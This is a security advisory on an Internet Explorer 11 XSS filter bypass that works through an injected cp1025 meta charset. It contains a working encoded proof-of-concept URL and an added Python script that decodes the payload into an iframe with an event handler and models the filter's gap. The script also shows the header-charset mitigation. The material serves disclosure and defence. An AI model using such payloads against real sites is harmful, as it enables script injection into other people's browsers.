Microsoft Internet Explorer 11 XSS Filter Bypass

2016-06-12T00:00:00
ID PACKETSTORM:137432
Type packetstorm
Reporter Rafay Baloch
Modified 2016-06-12T00:00:00

Description

                                        
                                            `#Vulnerability: IE 11 XSS Filter Bypass  
#Impact: Moderate  
#Authors: Rafay Baloch  
#Company: RHAInfoSec  
#Website: http://rafayhackingarticles.net  
#version: Latest  
  
Description  
  
Internet Explorer 11 suffers from an XSS filter bypass using the cp1025  
(IBM EBCDIC Cyrillic) charset. The bypass is most effective when the  
webmaster has not set a charset for the page, since an injected  
<meta charset> declaration then decides how the rest of the response is  
decoded.  
The issue occurs because the filter's regular expressions try to match  
the legacy "http-equiv" charset declaration instead of the  
"<meta charset" form. A payload placed after the meta tag and written  
in EBCDIC therefore matches none of the filter's ASCII-based signatures,  
while the browser, having switched to cp1025, reads it as markup.  
  
Proof of Concept  
  
The following is the Proof of concept:  
http://challenge.hackvertor.co.uk/xss.php?x=%3Cmeta%20charset=cp1025%3E%27%20L%C9%86%D9%81%D4%85%40%C9%84~[%40%D6%95%D4%96%E4%A2%85%D6%A5%C5%99~m~%60JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N}}]JmmmmZNMO}}N}}]JmZNM[N}}]JmmmmmmZZMm]n  
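As an added illustration (this is not part of the original advisory), the Python below percent-decodes the x parameter of the proof of concept above and re-reads the bytes after the <meta> tag as cp1025, which is what IE does once it honours the injected charset declaration. Python does not ship a cp1025 codec, so the table is assembled from cp037 plus the five punctuation positions where IBM code page 1025 differs; that table, the toy filter rules (SCRIPT_ISH, HTTP_EQUIV_ONLY, ANY_META_CHARSET) and the effective_charset helper are this example's own assumptions and not the IE filter's actual regular expressions.

```python
"""Decode the advisory's cp1025 proof of concept and show why the filter misses it.

Added example, not code from the advisory. Python has no cp1025 codec, so the
EBCDIC table is assembled from cp037 plus the punctuation positions where IBM
code page 1025 differs (an assumption taken from the IBM definitions; the
Cyrillic letters of cp1025 are not needed for this payload and are omitted).
"""
import re
from typing import Optional
from urllib.parse import unquote_to_bytes

# The x= parameter of the proof-of-concept URL, verbatim from the advisory.
POC_X = (
    "%3Cmeta%20charset=cp1025%3E%27%20L%C9%86%D9%81%D4%85%40%C9%84~[%40%D6%95"
    "%D4%96%E4%A2%85%D6%A5%C5%99~m~%60JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^"
    "[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N}}]JmmmmZNMO}}N}}]JmZNM[N}}]JmmmmmmZZMm]n"
)
POC_RAW = unquote_to_bytes(POC_X)  # the bytes as the server would reflect them

# Positions where cp1025 punctuation differs from cp037 (assumed, see above).
CP1025_OVERRIDES = {0x4A: "[", 0x4F: "!", 0x5A: "]", 0x5F: "^", 0x6A: "|"}


def decode_cp1025(data: bytes) -> str:
    """Decode EBCDIC bytes the way a browser switched to cp1025 reads them."""
    return "".join(
        CP1025_OVERRIDES.get(b, bytes([b]).decode("cp037")) for b in data
    )


def browser_view(x_param: str) -> str:
    """Return the markup IE ends up parsing for the injected parameter.

    The <meta charset=cp1025> tag itself is plain ASCII, so the browser reads
    it first, switches decoder, and reads everything after it as EBCDIC.
    The two control bytes (0x27 0x20) that open the payload are dropped."""
    raw = unquote_to_bytes(x_param)
    end = raw.index(b">") + 1
    meta, rest = raw[:end].decode("ascii"), raw[end:]
    return meta + "".join(c for c in decode_cp1025(rest) if c.isprintable())


# Signatures an ASCII-oriented filter looks for in the raw response bytes.
SCRIPT_ISH = re.compile(rb"<\s*(?:script|iframe|img|svg)|on\w+\s*=", re.I)
# The charset rule the advisory describes: only the legacy http-equiv form ...
HTTP_EQUIV_ONLY = re.compile(rb"<meta[^>]*http-equiv", re.I)
# ... versus also catching the HTML5 <meta charset=...> form.
ANY_META_CHARSET = re.compile(rb"<meta[^>]*(?:charset|http-equiv)", re.I)


def filter_blocks(x_param: str, charset_rule: re.Pattern) -> bool:
    """Toy reflected-XSS filter: block when the raw bytes carry a script-like
    signature or a charset declaration that charset_rule recognises."""
    raw = unquote_to_bytes(x_param)
    return bool(SCRIPT_ISH.search(raw) or charset_rule.search(raw))


def effective_charset(content_type: Optional[str], body: bytes) -> Optional[str]:
    """Charset the browser decodes with: a charset in the HTTP Content-Type
    header takes precedence over any <meta charset> in the body, so the
    injected declaration only takes effect when the header leaves it unset."""
    m = re.search(r"charset=([\w-]+)", content_type or "", re.I)
    if m:
        return m.group(1).lower()
    m = re.search(rb"<meta[^>]*charset\s*=\s*['\"]?([\w-]+)", body, re.I)
    return m.group(1).decode("ascii").lower() if m else None


if __name__ == "__main__":
    print("browser sees            :", browser_view(POC_X))
    print("http-equiv rule blocks  :", filter_blocks(POC_X, HTTP_EQUIV_ONLY))
    print("meta charset rule blocks:", filter_blocks(POC_X, ANY_META_CHARSET))
    print("charset, header silent  :", effective_charset("text/html", POC_RAW))
    print("charset, header set     :",
          effective_charset("text/html; charset=utf-8", POC_RAW))
```

Run as a script, browser_view shows that the EBCDIC bytes decode to an <IfRaMe Id=$ OnMoUseOvEr=...> tag whose handler is built almost entirely from punctuation, spelling "alert" out of the characters of "false", "true" and the "[object ...]" string form of the element named $; none of those bytes look like a tag or an event handler when read as ASCII, which is why only the charset rule can stop the payload. The last function is the practitioner's takeaway: with charset set in the Content-Type header the injected <meta> is ignored and the bypass does nothing.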